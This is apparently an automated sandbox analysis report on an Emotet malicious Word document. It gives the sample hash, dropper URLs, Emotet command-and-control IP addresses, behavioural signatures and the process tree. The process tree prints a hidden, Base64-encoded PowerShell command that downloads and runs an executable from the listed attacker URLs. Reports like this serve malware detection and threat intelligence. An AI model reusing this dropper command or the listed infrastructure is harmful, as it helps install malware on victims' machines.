Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    28-01-2020 08:42

General

  • Target

    7b9b0e6f429cad4b53d605cdc166d65f5f9b69fa8bb13c337ee489227aacc8e8.doc

  • Sample

    200128-nb8h6qhgf2

  • SHA256

    7b9b0e6f429cad4b53d605cdc166d65f5f9b69fa8bb13c337ee489227aacc8e8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://graphicxer.com/grap/c8ooz/

exe.dropper

http://dev-advice.resumenerd.com/wp-admin/css/jlPeGjc/

exe.dropper

https://modernwomenstyle.com/wp-includes/W/

exe.dropper

https://services.booyegol.com/wp-admin/A5O2F2WBoX/

exe.dropper

https://fa.goodarchitecture.org/wp-content/tPBzjh4/

Extracted

Family

emotet

C2

207.177.72.129:8080

23.243.215.4:8080

218.255.173.106:80

136.243.205.112:7080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

64.66.6.71:8080

66.34.201.20:7080

85.152.174.56:80

202.175.121.202:8090

87.106.139.101:8080

176.9.43.37:8080

98.156.206.153:80

159.65.25.128:8080

70.184.9.39:8080

209.146.22.34:443

95.213.236.64:8080

98.30.113.161:80

59.103.164.174:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7b9b0e6f429cad4b53d605cdc166d65f5f9b69fa8bb13c337ee489227aacc8e8.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4812
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABFAHgAYQBxAHEAbwBoAHcAbQBjAHAAYwBsAD0AJwBMAGcAeABtAGUAYwB2AGsAagB2AGcAawAnADsAJABaAGUAZABxAHAAZwB6AGsAaAB2AHEAegBkACAAPQAgACcAMQA0ADgAJwA7ACQAQQBlAGQAbwBkAG0AYgBnAG8AaABzAGgAPQAnAEEAZQBuAGYAbQBqAGsAYwBxAGEAdQAnADsAJABJAGsAegBoAGkAbABpAGoAYgB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABaAGUAZABxAHAAZwB6AGsAaAB2AHEAegBkACsAJwAuAGUAeABlACcAOwAkAFIAdgBqAGUAZABrAHMAYgBsAHkAPQAnAEkAawB6AGoAZgBtAHUAZgAnADsAJABXAHkAbQBpAHUAYgBtAGoAZABkAHkAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBMAGkAZQBuAHQAOwAkAFcAagBzAGUAeABiAHgAawB4AG4AZQBuAD0AJwBoAHQAdABwADoALwAvAGcAcgBhAHAAaABpAGMAeABlAHIALgBjAG8AbQAvAGcAcgBhAHAALwBjADgAbwBvAHoALwAqAGgAdAB0AHAAOgAvAC8AZABlAHYALQBhAGQAdgBpAGMAZQAuAHIAZQBzAHUAbQBlAG4AZQByAGQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAcwBzAC8AagBsAFAAZQBHAGoAYwAvACoAaAB0AHQAcABzADoALwAvAG0AbwBkAGUAcgBuAHcAbwBtAGUAbgBzAHQAeQBsAGUALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFcALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGUAcgB2AGkAYwBlAHMALgBiAG8AbwB5AGUAZwBvAGwALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEEANQBPADIARgAyAFcAQgBvAFgALwAqAGgAdAB0AHAAcwA6AC8ALwBmAGEALgBnAG8AbwBkAGEAcgBjAGgAaQB0AGUAYwB0AHUAcgBlAC4AbwByAGcALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABQAEIAegBqAGgANAAvACcALgAiAFMAUABgAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUQB0AGYAcgBjAGsAeQBvAGQAdQA9ACcASgBsAGUAZABvAHgAeQBtAHAAZwBxAGQAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASQBlAGcAegBiAHkAYwBmACAAaQBuACAAJABXAGoAcwBlAHgAYgB4AGsAeABuAGUAbgApAHsAdAByAHkAewAkAFcAeQBtAGkAdQBiAG0AagBkAGQAeQAuACIAZABvAFcATgBgAGwAbwBgAEEAZABGAGkAYABMAEUAIgAoACQASQBlAGcAegBiAHkAYwBmACwAIAAkAEkAawB6AGgAaQBsAGkAagBiAHgAKQA7ACQAVABsAG4AegBkAHEAaQBlAHEAegA9ACcASABkAHgAdQBiAGgAaQBhAG4AJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABJAGsAegBoAGkAbABpAGoAYgB4ACkALgAiAEwARQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgAzADQANwA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgB0ACIAKAAkAEkAawB6AGgAaQBsAGkAagBiAHgAKQA7ACQAVwBnAGsAdABrAGMAYgBuAGQAegBmAGMAcQA9ACcASgBiAGgAbwBlAGIAcQBxAGkAcgBsACcAOwBiAHIAZQBhAGsAOwAkAFUAeQB4AG8AaQBwAGQAeABnAG8AdQBvAHgAPQAnAEkAeQB1AGUAZwBxAHoAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZAHcAZgBxAGIAYwB5AG4AZgB0AGYAPQAnAFUAYQByAHQAZABuAG0AegBnAGMAbgAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    PID:4396
    • C:\Users\Admin\148.exe
      "C:\Users\Admin\148.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4476
      • C:\Users\Admin\148.exe
        --66a5bb13
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:1628

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1628-12-0x0000000002110000-0x0000000002125000-memory.dmp

    Filesize

    84KB

  • memory/1628-13-0x0000000000400000-0x000000000047C000-memory.dmp

    Filesize

    496KB

  • memory/4476-10-0x0000000002430000-0x0000000002445000-memory.dmp

    Filesize

    84KB